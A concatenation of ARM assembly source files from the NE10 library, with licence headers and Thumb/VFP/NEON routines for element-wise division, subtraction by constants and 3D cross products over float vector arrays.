@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_divc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_divc_float_asm
.thumb
.thumb_func
ne10_divc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_divc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vmov s3, r2 @ Get cst into register s3
vdiv.f32 s10, s1, s3 @ s10 = src[i] / cst
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_divc_vec2f_asm
.thumb
.thumb_func
ne10_divc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_divc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x and src[i].y
vldr s2, [r6, #4]
vldr s3, [r2, #0] @ Load cst->x and cst->y
vldr s4, [r2, #4]
vdiv.f32 s10, s1, s3 @ s10 = src[i].x / cst->x
vdiv.f32 s11, s2, s4 @ s11 = src[i].y / cst->y
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_divc_vec3f_asm
.thumb
.thumb_func
ne10_divc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_divc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r2, #0] @ Load cst->x, cst->y, and cst->z
vldr s5, [r2, #4]
vldr s6, [r2, #8]
vdiv.f32 s10, s1, s4 @ s10 = src[i].x / cst->x
vdiv.f32 s11, s2, s5 @ s11 = src[i].y / cst->y
vdiv.f32 s12, s3, s6 @ s12 = src[i].z / cst->z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) @@ (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_divc_vec4f_asm
.thumb
.thumb_func
ne10_divc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_divc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vldr s5, [r2, #0] @ Load cst->x, cst->y, cst->z, and w
vldr s6, [r2, #4]
vldr s7, [r2, #8]
vldr s8, [r2, #12]
vdiv.f32 s10, s1, s5 @ s10 = src[i].x / cst->x
vdiv.f32 s11, s2, s6 @ s11 = src[i].y / cst->y
vdiv.f32 s12, s3, s7 @ s12 = src[i].z / cst->z
vdiv.f32 s13, s4, s8 @ s13 = src[i].w / cst->w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) @@ (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_invmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_invmat.asm.s
@
|
open-vela/external_Ne10 | 9,791 | modules/math/NE10_subc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_subc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_subc_float_asm
.thumb
.thumb_func
ne10_subc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_subc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vmov s3, r2 @ Get cst into register s3
vsub.f32 s10, s1, s3 @ s10 = src[i] - cst
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_subc_vec2f_asm
.thumb
.thumb_func
ne10_subc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_subc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x and src[i].y
vldr s2, [r6, #4]
vldr s3, [r2, #0] @ Load cst->x and cst->y
vldr s4, [r2, #4]
vsub.f32 s10, s1, s3 @ s10 = src[i].x - cst->x
vsub.f32 s11, s2, s4 @ s11 = src[i].y - cst->y
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_subc_vec3f_asm
.thumb
.thumb_func
ne10_subc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_subc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r2, #0] @ Load cst->x, cst->y, and cst->z
vldr s5, [r2, #4]
vldr s6, [r2, #8]
vsub.f32 s10, s1, s4 @ s10 = src[i].x - cst->x
vsub.f32 s11, s2, s5 @ s11 = src[i].y - cst->y
vsub.f32 s12, s3, s6 @ s12 = src[i].z - cst->z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) @@ (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_subc_vec4f_asm
.thumb
.thumb_func
ne10_subc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_subc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vldr s5, [r2, #0] @ Load cst->x, cst->y, cst->z, and w
vldr s6, [r2, #4]
vldr s7, [r2, #8]
vldr s8, [r2, #12]
vsub.f32 s10, s1, s5 @ s10 = src[i].x - cst->x
vsub.f32 s11, s2, s6 @ s11 = src[i].y - cst->y
vsub.f32 s12, s3, s7 @ s12 = src[i].z - cst->z
vsub.f32 s13, s4, s8 @ s13 = src[i].w - cst->w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) @@ (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 5,357 | modules/math/NE10_cross.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_cross.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_cross_vec3f_neon
.thumb
.thumb_func
ne10_cross_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_cross_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values for
vmul.f32 d20, d2, d5
vmul.f32 d21, d4, d1
vmul.f32 d22, d0, d3
vmls.f32 d20, d3, d4
vmls.f32 d21, d5, d0
vmls.f32 d22, d1, d2
vst3.32 {d20[0], d21[0], d22[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
@ load current set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d26, d28, d30}, [r2]!
vld3.32 {d27, d29, d31}, [r2]!
.L_mainloop_vec3:
@ calculate values for the 2nd/next (e.g. 3rd) set
vmul.f32 q10, q1, q15
vmul.f32 q11, q2, q13
vmul.f32 q12, q0, q14
vmls.f32 q10, q14, q2
vmls.f32 q11, q15, q0
vmls.f32 q12, q13, q1
@ store the result for the 1st/next (e.g. 3rd) set
vst3.32 {d20, d22, d24}, [r0]!
vst3.32 {d21, d23, d25}, [r0]!
subs r3, r3, #1
@ load the next (e.g. 3rd) set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d26, d28, d30}, [r2]!
vld3.32 {d27, d29, d31}, [r2]!
bgt .L_mainloop_vec3 @ loop if r2 is > r3, if we have at least another 4 vectors (12 floats) to process
.L_return_vec3:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 1,605 | modules/math/NE10_dot.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_dot.asm.s
@
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_div.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_div.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_div_float_asm
.thumb
.thumb_func
ne10_div_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_vec2f_t * dst,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current src1 entry's address - made of base(r0)+offset(r5)
@ r1: *src1 & current src1 entry's address - made of base(r1)+offset(r5)
@ r2: *src2 & current src2 entry's address - made of base(r2)+offset(r5)
@ r3: int count
@
@ r3: loop counter
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat
.LoopBeginFloat:
vldr s1, [r1] @ Load s1 = src1[i]
add r1, r1, #4 @ move to the next entry
vldr s2, [r2] @ Load s2 = src2[i]
add r2, r2, #4 @ next entry
vdiv.f32 s10, s1, s2 @ s10 = src1[i] / src2[i]
vstr s10, [r0] @ Store the result back into the main memory
add r0, r0, #4 @ next entry in the dst
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_mulmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulmat.asm.s
@
|
open-vela/external_Ne10 | 1,613 | modules/math/NE10_identitymat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
